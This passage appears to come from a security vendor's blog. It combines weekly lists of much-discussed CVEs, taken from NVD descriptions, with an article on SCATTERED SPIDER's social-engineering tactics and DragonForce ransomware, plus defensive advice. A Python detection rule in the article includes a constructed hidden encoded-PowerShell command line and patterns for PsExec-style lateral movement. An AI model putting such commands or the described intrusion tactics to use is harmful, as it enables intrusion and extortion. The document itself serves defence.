The SOS Intelligence CVE Chatter Weekly Top Ten – 16 June 2025

This weekly blog post is compiled from data gathered via our unique intelligence collection pipelines. We are your eyes and ears online, including the Dark Web.

There are thousands of vulnerability discussions each week. SOS Intelligence gathers a list of the most discussed Common Vulnerabilities and Exposures (CVE) online for the previous week.

We make every effort to ensure the accuracy of the data presented. As this is an automated process some errors may creep in.

If you are feeling generous, please make us aware of anything you spot: follow us on Twitter @sosintel and DM us. Thank you!

1. CVE-2016-10033

The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property.

https://nvd.nist.gov/vuln/detail/CVE-2016-10033

2. CVE-2025-5287

The Likes and Dislikes Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘post’ parameter in all versions up to, and including, 1.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

https://nvd.nist.gov/vuln/detail/CVE-2025-5287

3. CVE-2025-5419

Out of bounds read and write in V8 in Google Chrome prior to 137.0.7151.68 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

https://nvd.nist.gov/vuln/detail/CVE-2025-5419

4. CVE-2025-2783

Incorrect handle provided in unspecified circumstances in Mojo in Google Chrome on Windows prior to 134.0.6998.177 allowed a remote attacker to perform a sandbox escape via a malicious file. (Chromium security severity: High)

https://nvd.nist.gov/vuln/detail/CVE-2025-2783

5. CVE-2017-8759

Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7 allow an attacker to execute code remotely via a malicious document or application, aka “.NET Framework Remote Code Execution Vulnerability.”

https://nvd.nist.gov/vuln/detail/CVE-2017-8759

6. CVE-2025-49113

Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution by authenticated users because the _from parameter in a URL is not validated in program/actions/settings/upload.php, leading to PHP Object Deserialization.

https://nvd.nist.gov/vuln/detail/CVE-2025-49113

7. CVE-2024-21762

An out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7 allows an attacker to execute unauthorized code or commands via specifically crafted requests.

https://nvd.nist.gov/vuln/detail/CVE-2024-21762

8. CVE-2024-10687

The Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons plugin for WordPress is vulnerable to time-based SQL Injection via the $collectedIds parameter in all versions up to, and including, 24.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

https://nvd.nist.gov/vuln/detail/CVE-2024-10687

9. CVE-2024-21060

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Data Dictionary). Supported versions that are affected are 8.0.36 and prior and 8.3.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

https://nvd.nist.gov/vuln/detail/CVE-2024-21060

10. CVE-2025-5958

Use after free in Media in Google Chrome prior to 137.0.7151.103 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

https://nvd.nist.gov/vuln/detail/CVE-2025-5958

The SOS Intelligence CVE Chatter Weekly Top Ten – 09 June 2025

1. CVE-2025-48828

Certain vBulletin versions might allow attackers to execute arbitrary PHP code by abusing Template Conditionals in the template engine. By crafting template code in an alternative PHP function invocation syntax, such as the "var_dump"("test") syntax, attackers can bypass security checks and execute arbitrary PHP code, as exploited in the wild in May 2025.

https://nvd.nist.gov/vuln/detail/CVE-2025-48828

2. CVE-2025-48827

vBulletin 5.0.0 through 5.7.5 and 6.0.0 through 6.0.3 allows unauthenticated users to invoke protected API controllers’ methods when running on PHP 8.1 or later, as demonstrated by the /api.php?method=protectedMethod pattern, as exploited in the wild in May 2025.

https://nvd.nist.gov/vuln/detail/CVE-2025-48827

3. CVE-2025-5287

The Likes and Dislikes Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘post’ parameter in all versions up to, and including, 1.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

https://nvd.nist.gov/vuln/detail/CVE-2025-5287

4. CVE-2025-5419

Out of bounds read and write in V8 in Google Chrome prior to 137.0.7151.68 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

https://nvd.nist.gov/vuln/detail/CVE-2025-5419

5. CVE-2025-2783

Incorrect handle provided in unspecified circumstances in Mojo in Google Chrome on Windows prior to 134.0.6998.177 allowed a remote attacker to perform a sandbox escape via a malicious file. (Chromium security severity: High)

https://nvd.nist.gov/vuln/detail/CVE-2025-2783

6. CVE-2024-6409

A race condition vulnerability was discovered in how signals are handled by OpenSSH’s server (sshd). If a remote attacker does not authenticate within a set time period, then sshd’s SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). As a consequence of a successful attack, in the worst case scenario, an attacker may be able to perform a remote code execution (RCE) as an unprivileged user running the sshd server.

https://nvd.nist.gov/vuln/detail/CVE-2024-6409

7. CVE-2025-32433

Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, an SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This issue is patched in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. A temporary workaround is to disable the SSH server or to block access to it with firewall rules.

https://nvd.nist.gov/vuln/detail/CVE-2025-32433

8. CVE-2024-21887

A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.

https://nvd.nist.gov/vuln/detail/CVE-2024-21887

9. CVE-2017-8759

Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7 allow an attacker to execute code remotely via a malicious document or application, aka “.NET Framework Remote Code Execution Vulnerability.”

https://nvd.nist.gov/vuln/detail/CVE-2017-8759

10. CVE-2025-5054

Race condition in Canonical apport up to and including 2.32.0 allows a local attacker to leak sensitive information via PID-reuse by leveraging namespaces.

When handling a crash, the function `_check_global_pid_and_forward`, which detects if the crashing process resided in a container, was being called before `consistency_checks`, which attempts to detect if the crashing process had been replaced. Because of this, if a process crashed and was quickly replaced with a containerized one, apport could be made to forward the core dump to the container, potentially leaking sensitive information. `consistency_checks` is now being called before `_check_global_pid_and_forward`. Additionally, given that the PID-reuse race condition cannot be reliably detected from userspace alone, crashes are only forwarded to containers if the kernel provided a pidfd, or if the crashing process was unprivileged (i.e., if dump mode == 1).

https://nvd.nist.gov/vuln/detail/CVE-2025-5054

Understanding SCATTERED SPIDER: Tactics, Targets, and Defence Strategies

In recent months, a wave of disruptive cyberattacks has swept across high-profile organisations in both the UK and the US, affecting sectors ranging from hospitality and telecommunications to finance and retail. Many of these incidents share a common thread: attribution to a threat actor known as SCATTERED SPIDER, a group now gaining notoriety for its aggressive use of social engineering and its partnership with the DragonForce ransomware-as-a-service (RaaS) operation.

Unlike traditional ransomware gangs that rely heavily on technical exploits or brute-force tactics, SCATTERED SPIDER stands out for its deeply manipulative approach. The group has repeatedly demonstrated its ability to impersonate employees, deceive IT support teams, and bypass multi-factor authentication (MFA) through cunning psychological tactics. Often described as “native English speakers,” they are suspected to operate in or have ties to Western countries, bringing a cultural fluency that makes their phishing and phone-based attacks alarmingly effective.

As law enforcement and cybersecurity professionals scramble to contain the fallout from recent attacks, one thing is clear: SCATTERED SPIDER is not just another ransomware affiliate. They represent a shift toward human-centric intrusion strategies, blending technical skill with social deception in a way that challenges even well-defended organisations.

This article takes a closer look at how SCATTERED SPIDER operates, the tools they use, including DragonForce RaaS and, most importantly, what practical steps individuals and organisations can take to reduce their exposure to this growing threat.

Image Credit: Crowdstrike

Who Is SCATTERED SPIDER?

SCATTERED SPIDER is the name given to a loosely affiliated cybercriminal group that has quickly gained attention for its highly targeted and persistent campaigns against major organisations. Believed to be active since at least 2022, the group is often classified as an Initial Access Broker (IAB) and affiliate actor, working both independently and in partnership with larger ransomware collectives, most notably the ALPHV/BlackCat operation.

What sets SCATTERED SPIDER apart is not just its technical acumen, but its expert use of social engineering, often executed in fluent English and with a level of cultural familiarity that suggests the group is likely based in or has strong ties to the US or UK. Unlike many ransomware actors operating out of Eastern Europe or Russia, SCATTERED SPIDER’s tactics are tailored to Western corporate environments, allowing them to convincingly impersonate staff, manipulate helpdesk personnel, and bypass traditional security barriers with unnerving ease.

The group’s motivation is primarily financial, but their techniques are unusually aggressive. Rather than simply deploying ransomware after gaining access, SCATTERED SPIDER takes the time to navigate internal systems, escalate privileges, and exfiltrate data, ensuring maximum impact and leverage during extortion. This has included threats to publicly leak sensitive data if ransoms aren’t paid, a tactic made easier by their ties to DragonForce RaaS, a ransomware service that offers data leak platforms and other tools to affiliates.

Notable incidents attributed to SCATTERED SPIDER include:

  • The 2023 attack on MGM Resorts, which saw large-scale IT disruption across casinos and hotels in the US, was reportedly caused by a simple phone-based social engineering ploy.
  • Intrusions into telecommunications and managed service providers, where they have targeted identity infrastructure such as Okta and Active Directory to pivot across networks.
  • Disruption and data theft in the financial and insurance sectors, where highly sensitive customer and operational data were exfiltrated and held to ransom.

These campaigns reveal a group that is not only technically capable but strategically manipulative, leveraging trust, urgency, and insider knowledge to achieve access that many automated tools would struggle to obtain.

The Tools of the Trade: DragonForce RaaS

One of the key enablers of SCATTERED SPIDER’s recent success has been their alignment with DragonForce, a relatively new entrant in the expanding Ransomware-as-a-Service (RaaS) ecosystem. RaaS models have radically altered the cybercrime landscape. Much like SaaS (Software-as-a-Service) in the legitimate tech world, RaaS lowers the barrier to entry for less technically capable threat actors by offering turnkey ransomware toolkits, user-friendly dashboards, and profit-sharing agreements between developers and affiliates.

What Is DragonForce?

DragonForce is a commercially operated ransomware platform, complete with a slick user interface, customer “support” channels, and marketing-style updates promoting new features and obfuscation techniques. While it may not yet have the brand recognition of LockBit or BlackCat, it is gaining traction among cybercriminal groups for its reliability, speed, and aggressive encryption routines.

Its offerings typically include:

  • Highly customisable payloads: Affiliates like SCATTERED SPIDER can tweak encryption settings, file extensions, and ransom notes to suit their targets.
  • Data exfiltration modules: These facilitate double extortion, where files are stolen before encryption and used as additional leverage during ransom negotiations.
  • Dark Web leak portals: Victim data is published or threatened with publication unless payment is made.
  • Access to a central control panel: Affiliates can monitor infected machines, initiate encryption manually, and track ransom payments via cryptocurrency wallets.

These features allow threat actors to operate more like cybercrime startups than ad-hoc hacking collectives.

Why SCATTERED SPIDER Uses DragonForce

SCATTERED SPIDER’s strength lies in gaining initial access, often via phone-based social engineering or SIM-swapping tactics, rather than building their own ransomware from scratch. By outsourcing encryption and extortion capabilities to a RaaS provider like DragonForce, they focus on what they do best: manipulating people, navigating corporate networks, and extracting sensitive data.

In this partnership, DragonForce gains a capable affiliate who can deliver high-value access, and SCATTERED SPIDER gains a ready-made suite of tools to monetise their intrusions. This division of labour reflects a broader shift in cybercrime, one where specialisation and scalability are the name of the game.

DragonForce and the RaaS Economy

It’s important to understand that DragonForce is not an isolated actor. It is part of a wider criminal ecosystem where:

  • Access brokers sell stolen credentials or remote access.
  • Malware developers lease out payloads to trusted affiliates.
  • Negotiators and money launderers offer “aftercare” services.

This ecosystem enables threat actors to operate like businesses, complete with hierarchical roles, profit-sharing models, and even internal dispute resolution mechanisms. In this context, SCATTERED SPIDER is not just a lone wolf but a well-placed operator within a highly coordinated cybercrime supply chain.

Why This Matters

The use of DragonForce by SCATTERED SPIDER highlights two alarming trends:

  1. Professionalisation of ransomware: You no longer need deep technical knowledge to execute devastating attacks; just access, confidence, and a few phone calls.
  2. Faster time-to-impact: With everything from encryption to extortion automated and streamlined, the time between compromise and ransom demand is shrinking rapidly, leaving organisations with little time to detect and respond.

As DragonForce continues to evolve and attract new affiliates, we are likely to see more actors adopt this model of rapid-access, rapid-extortion ransomware operations.

Image Credit: Kaspersky

Anatomy of an Attack: How SCATTERED SPIDER Operates

Understanding how SCATTERED SPIDER executes its attacks is crucial for organisations looking to strengthen their defences. Unlike many ransomware operators who rely on brute-force tactics or mass phishing campaigns, SCATTERED SPIDER favours precision, patience, and psychological manipulation.

Here’s a typical flow of operations observed in their campaigns:

1. Reconnaissance and Target Selection

The group begins by identifying high-value targets, often large enterprises in sectors such as telecommunications, financial services, and IT. They may purchase access to credentials or endpoint telemetry from Initial Access Brokers (IABs) or scrape publicly available information from LinkedIn, press releases, and social media to build detailed profiles of staff and infrastructure.

What makes this phase effective:

  • Use of OSINT to identify staff names, departments, and third-party vendors.
  • Focus on companies with complex IT environments and a low tolerance for operational disruption, prime candidates for extortion.

2. Initial Access via Social Engineering

Once they’ve identified the right entry point, SCATTERED SPIDER often deploys vishing (voice phishing) or phishing techniques to impersonate internal staff. In some cases, they call help desks pretending to be employees locked out of their accounts, requesting MFA resets or password changes.

This is where their native English and cultural familiarity give them a dangerous edge; they sound credible, confident, and urgent.

Common tactics:

  • Impersonating IT staff or executives to pressure support teams.
  • SIM-swapping or MFA fatigue attacks to intercept or bypass two-factor authentication.
  • Spoofed email domains or compromised inboxes used for internal-style phishing.

3. Credential Harvesting and Privilege Escalation

Once inside, the group moves quickly to extract further credentials. Tools such as Mimikatz, Cobalt Strike, and legitimate Windows administration tools (e.g. PowerShell, PsExec) are used to escalate privileges and move laterally across the network.

They specifically look for access to:

  • Identity infrastructure (Active Directory, Okta, Azure AD)
  • Remote access tools (VPNs, RDP gateways, Citrix)
  • Data repositories containing sensitive customer or business data

This phase may last hours or days, depending on the target’s size and the level of access achieved.

4. Data Exfiltration and Pre-Ransom Preparation

Before deploying ransomware, SCATTERED SPIDER usually exfiltrates a trove of sensitive data. This forms the basis of their double extortion strategy; even if a victim can restore from backups, they may still pay to prevent the public release of confidential files.

Common methods:

  • Compressing and uploading files to cloud storage services or attacker-controlled servers
  • Encrypting and staging data to avoid detection by DLP or antivirus tools

In some cases, the group leaves behind backdoors or admin accounts to retain long-term access or re-extort victims in the future.

5. Ransomware Deployment via DragonForce

Once exfiltration is complete and the environment is primed, SCATTERED SPIDER deploys DragonForce ransomware across the compromised network. The ransomware is configured to encrypt files rapidly and disrupt operations, sometimes including domain controllers and backup servers, to maximise impact.

Victims then receive a ransom note directing them to a Tor-based portal for negotiations. If payment isn’t made within a specified timeframe, stolen data is posted on a leak site associated with DragonForce.


Key Takeaways:

  • SCATTERED SPIDER relies on human error as much as technical vulnerabilities.
  • The group’s knowledge of Western IT environments makes it easier for them to blend in and manipulate systems and staff.
  • Their multi-stage attack chain (access, escalation, exfiltration, encryption) is methodical and difficult to detect in real time.

Image Credit – Reeds Solicitors

Why SCATTERED SPIDER’s Approach Is Especially Dangerous

SCATTERED SPIDER doesn’t operate like a traditional ransomware crew. Their campaigns combine social engineering finesse with technical aggression, resulting in a hybrid threat model that blends cybercrime with tactics more often associated with espionage groups. Here’s why they stand out and why they’re so difficult to defend against.

1. Deep Impersonation and Real-Time Manipulation

Unlike typical phishing groups that rely on mass email blasts, SCATTERED SPIDER employs live, targeted deception. Their operators speak fluent, unaccented English and are adept at impersonating IT personnel, executives, or employees in distress.

They frequently call help desks or IT support lines, using:

  • Personalised information gathered through OSINT
  • Spoofed phone numbers and internal-sounding email addresses
  • Calm, confident delivery to manipulate support staff in real time

This level of human-centred deception is rarely seen in conventional cybercrime campaigns and poses a serious challenge for security teams.

2. Precision Targeting of Identity Infrastructure

SCATTERED SPIDER understands that identity is the new perimeter. Rather than merely compromising a system, they aim to take control of identity and access management tools like:

  • Okta
  • Active Directory
  • Azure AD
  • SSO and MFA services

By doing so, they’re not just accessing individual endpoints, they’re taking over the core trust fabric of the organisation. Once they own your identity systems, lateral movement and persistence become trivially easy.

3. Speed and Aggression Outpacing Detection

While many attackers spend weeks in a network quietly collecting data, SCATTERED SPIDER moves with urgency and intent. In many cases:

  • Initial access to ransomware deployment can take place in less than 48 hours.
  • They bypass traditional controls using legitimate tools (Living off the Land), leaving minimal forensic traces.
  • They often disable security tools, delete logs, or backdoor admin accounts to stay one step ahead.

Traditional defences based on known signatures, blacklists, or passive monitoring are often too slow or too blind to respond in time.

4. Blurring the Line Between Cybercrime and Nation-State Tactics

Although motivated by financial gain rather than geopolitics, SCATTERED SPIDER’s tradecraft exhibits a level of maturity and adaptation more typical of state-sponsored APT groups. This includes:

  • Tailored intrusion techniques for specific industries and environments
  • Multi-stage attacks with operational patience
  • Use of multiple extortion channels, including PR pressure and data leak sites

This hybrid operational model (part ransomware gang, part APT) means traditional classifications don't fully capture the scope of their threat. For defenders, this creates both strategic confusion and escalating risk.

In short, SCATTERED SPIDER is dangerous not just because of what they do, but how they do it. Their blend of psychological manipulation, identity compromise, and rapid escalation makes them one of the most formidable threats facing organisations today.

Defending Against SCATTERED SPIDER: Practical Guidance

While SCATTERED SPIDER’s tactics are sophisticated, they often exploit basic lapses in process, communication, and identity management. That means there are precautions organisations can take to harden themselves against this type of threat, without needing to reinvent their entire security stack.

1. Reinforce Help Desk Security Protocols

Since SCATTERED SPIDER frequently targets help desks and support teams, ensure those teams are trained to:

  • Never reset MFA or passwords without high-assurance identity verification.
  • Use call-back procedures or out-of-band verification for unusual requests.
  • Flag repeated or urgent requests as potential social engineering.

Adding simple checklists and mandatory escalation paths for sensitive account changes can drastically reduce social engineering success rates.

2. Harden Identity and Access Management

Identity remains a prime attack surface. To reduce risk:

  • Enforce phishing-resistant MFA, such as FIDO2/WebAuthn security keys or passkeys, rather than SMS or email codes. App-based push approval is better than SMS but is not phishing-resistant: it remains exposed to the MFA fatigue attacks described above unless number matching is enforced, and even then a help desk can be talked into re-enrolling it.
  • Implement just-in-time access and least privilege policies for administrative accounts.
  • Regularly audit inactive accounts, especially third-party vendors and former employees.

Integrate identity telemetry into your detection stack: suspicious logins, MFA resets, or logins from new devices should trigger alerts.

3. Monitor for Signs of Lateral Movement

Once SCATTERED SPIDER is inside a network, time is of the essence. Deploy tools and strategies to detect:

  • Unusual use of remote admin tools (e.g. PowerShell, PsExec)
  • Use of credential dumping tools or abnormal privilege escalation
  • Lateral movement attempts, especially to identity infrastructure like Active Directory or Okta

EDR/XDR platforms with good behavioural analytics can be critical here, especially when coupled with 24/7 monitoring or MDR services.
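Sections 2 and 3 list the signals to collect (help-desk MFA resets, sign-ins from new devices, PsExec-style service installs and encoded PowerShell on endpoints) but not how to join them. The following is an added example, not SOS Intelligence's tooling, of a correlation rule that ties those signals together in the order the "Anatomy of an Attack" section lays out. The event records are constructed, and the field names and the PSEXESVC/PAEXEC service names are assumptions chosen to resemble help-desk, IdP and Windows telemetry rather than any vendor's schema.

```python
"""Added example: correlate help-desk, identity and endpoint telemetry for the
reset -> new-device sign-in -> lateral-movement chain described in the article.

Not SOS Intelligence's tooling. Events are constructed; field names are assumptions.
"""
import re
from datetime import datetime, timedelta

# Constructed sample telemetry (UTC, ISO-8601). Not real logs.
SAMPLE_EVENTS = [
    {"ts": "2025-06-10T09:02:00", "source": "helpdesk", "action": "mfa_reset",
     "user": "j.smith", "note": "caller says locked out; reset approved by phone"},
    {"ts": "2025-06-10T09:14:00", "source": "idp", "action": "signin",
     "user": "j.smith", "new_device": True, "ip": "203.0.113.44"},
    {"ts": "2025-06-10T11:40:00", "source": "endpoint", "action": "process_create",
     "user": "j.smith", "host": "WS-0412",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand SQBFAFgAIAAoAE4A..."},
    {"ts": "2025-06-10T12:05:00", "source": "endpoint", "action": "service_install",
     "user": "j.smith", "host": "DC01", "service": "PSEXESVC"},
    # Benign-looking noise: an admin account using PsExec with no identity anomaly.
    {"ts": "2025-06-10T13:00:00", "source": "endpoint", "action": "service_install",
     "user": "svc-patching", "host": "WS-0200", "service": "PSEXESVC"},
    # A reset with no follow-on activity: not alertable on its own.
    {"ts": "2025-06-11T08:00:00", "source": "helpdesk", "action": "mfa_reset",
     "user": "a.jones", "note": "reset at the desk; badge checked"},
]

# Encoded PowerShell in any of its short forms (-e, -ec, -enc, -EncodedCommand).
ENCODED_PS = re.compile(r"powershell(?:\.exe)?\b.*\s-(?:e|ec|enc|encodedcommand)\b", re.I)
# Service names left behind by PsExec-style tools (assumed list; extend for your estate).
LATERAL_SERVICES = {"PSEXESVC", "PAEXEC"}


def is_lateral_indicator(ev: dict) -> bool:
    """Section 3's endpoint signals: remote-admin service installs and encoded PowerShell."""
    if ev["action"] == "service_install":
        return ev.get("service", "").upper() in LATERAL_SERVICES
    if ev["action"] == "process_create":
        return bool(ENCODED_PS.search(ev.get("cmdline", "")))
    return False


def _ts(ev: dict) -> datetime:
    return datetime.fromisoformat(ev["ts"])


def correlate(events: list, window: timedelta = timedelta(hours=48)) -> list:
    """Return alerts. A help-desk MFA reset is the anchor; what the same user does
    inside `window` afterwards decides the severity:
      high   - new-device sign-in AND a lateral-movement indicator (the full chain)
      medium - one of the two
      low    - lateral-movement indicator with no preceding reset (still worth a look)
    """
    events = sorted(events, key=_ts)
    alerts, chained = [], set()
    for i, ev in enumerate(events):
        if ev["source"] != "helpdesk" or ev["action"] != "mfa_reset":
            continue
        user, t0 = ev["user"], _ts(ev)
        new_device, hosts = False, set()
        for j in range(i + 1, len(events)):
            later = events[j]
            if _ts(later) - t0 > window:
                break  # sorted, so nothing further can be inside the window
            if later["user"] != user:
                continue
            if later["action"] == "signin" and later.get("new_device"):
                new_device = True
            elif is_lateral_indicator(later):
                hosts.add(later["host"])
                chained.add(j)
        if new_device and hosts:
            severity = "high"
        elif new_device or hosts:
            severity = "medium"
        else:
            continue
        alerts.append({"severity": severity, "user": user,
                       "reset_at": ev["ts"], "hosts": sorted(hosts)})
    for j, ev in enumerate(events):
        if j not in chained and is_lateral_indicator(ev):
            alerts.append({"severity": "low", "user": ev["user"],
                           "reset_at": None, "hosts": [ev["host"]]})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The point of anchoring on the help-desk reset rather than on the endpoint indicator is that the reset is the cheapest event to log and the one SCATTERED SPIDER cannot avoid generating; the 48-hour window reflects the sub-two-day access-to-ransomware timelines described above, and shrinking it to minutes turns the same data into three unrelated low-priority alerts.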

4. Protect Your Data, and Know Where It Is

Given the group’s focus on data theft prior to encryption, prevention isn’t just about backups:

  • Map your critical data locations, especially customer, financial, and IP-related data.
  • Use Data Loss Prevention (DLP) tools to monitor exfiltration patterns.
  • Segment sensitive environments and restrict data access to only those who need it.

Ensure that backups are not just secure and segmented from your main network, but also tested regularly.

5. Prepare for the Human Side of a Crisis

Even strong technical controls can be undone by panic or poor decision-making in the moment. Prepare:

  • A ransomware playbook with clear response roles, legal guidance, and communications plans.
  • Crisis simulations or tabletop exercises that include scenarios involving data leaks and public extortion.
  • Training for executives and PR teams on how to manage the reputational and regulatory impact.

Remember: SCATTERED SPIDER succeeds by catching organisations off guard, so make sure your teams know exactly how to respond under pressure.


Security Culture Is Your Best Defence

At the end of the day, SCATTERED SPIDER’s tactics work because they exploit human trust, urgency, and complexity. Investing in detection tools is important, but fostering a culture of scepticism, verification, and shared responsibility across the organisation is what truly builds resilience.

Stay Vigilant, Stay Informed

SCATTERED SPIDER has proven that ransomware is no longer just about encrypted files and ransom notes — it’s about controlling identities, deceiving people, and outpacing traditional defences. Their campaigns demonstrate just how effective a threat actor can be when they combine technical proficiency with social engineering and real-time manipulation.

What makes them especially dangerous is not just the tools they use, but the tactics and mindset behind their operations. This is a group that studies its targets, adapts rapidly, and blends psychological and technical attacks with striking efficiency.

For organisations in the UK, the US, and beyond, the message is clear: security isn’t just a technology problem — it’s a people and process problem too. Preventing the next SCATTERED SPIDER-style breach means:

  • Educating and empowering support staff
  • Hardening identity infrastructure
  • Monitoring for the unexpected
  • And rehearsing how you’ll respond under pressure

Cybercriminals evolve constantly. So must we.

Header image: Photo by Егор Камелев on Unsplash.

The SOS Intelligence CVE Chatter Weekly Top Ten – 02 June 2025

1. CVE-2024-21762

An out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7 allows an attacker to execute unauthorized code or commands via specifically crafted requests.

https://nvd.nist.gov/vuln/detail/CVE-2024-21762

2. CVE-2018-17144

Bitcoin Core 0.14.x before 0.14.3, 0.15.x before 0.15.2, and 0.16.x before 0.16.3 and Bitcoin Knots 0.14.x through 0.16.x before 0.16.3 allow a remote denial of service (application crash) exploitable by miners via duplicate input. An attacker can make bitcoind or Bitcoin-Qt crash.

https://nvd.nist.gov/vuln/detail/CVE-2018-17144

3. CVE-2024-10687

The Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons plugin for WordPress is vulnerable to time-based SQL Injection via the $collectedIds parameter in all versions up to, and including, 24.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

https://nvd.nist.gov/vuln/detail/CVE-2024-10687

4. CVE-2024-21060

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Data Dictionary). Supported versions that are affected are 8.0.36 and prior and 8.3.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

https://nvd.nist.gov/vuln/detail/CVE-2024-21060

5. CVE-2025-3928

Commvault Web Server has an unspecified vulnerability that can be exploited by a remote, authenticated attacker. According to the Commvault advisory: “Webservers can be compromised through bad actors creating and executing webshells.” Fixed in version 11.36.46, 11.32.89, 11.28.141, and 11.20.217 for Windows and Linux platforms. This vulnerability was added to the CISA Known Exploited Vulnerabilities (KEV) Catalog on 2025-04-28.

https://nvd.nist.gov/vuln/detail/CVE-2025-3928

6. CVE-2022-39260

Git is an open source, scalable, distributed revision control system. `git shell` is a restricted login shell that can be used to implement Git’s push/pull functionality via SSH. In versions prior to 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4, the function that splits the command arguments into an array improperly uses an `int` to represent the number of entries in the array, allowing a malicious actor to intentionally overflow the return value, leading to arbitrary heap writes. Because the resulting array is then passed to `execv()`, it is possible to leverage this attack to gain remote code execution on a victim machine. Note that a victim must first allow access to `git shell` as a login shell in order to be vulnerable to this attack. This problem is patched in versions 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4 and users are advised to upgrade to the latest version. Disabling `git shell` access via remote logins is a viable short-term workaround.

https://nvd.nist.gov/vuln/detail/CVE-2022-39260

7. CVE-2025-47577

Unrestricted Upload of File with Dangerous Type vulnerability in TemplateInvaders TI WooCommerce Wishlist allows Upload a Web Shell to a Web Server. This issue affects TI WooCommerce Wishlist: from n/a through 2.9.2.

https://nvd.nist.gov/vuln/detail/CVE-2025-47577

8. CVE-2023-51385

In ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name.

https://nvd.nist.gov/vuln/detail/CVE-2023-51385

9. CVE-2022-23812

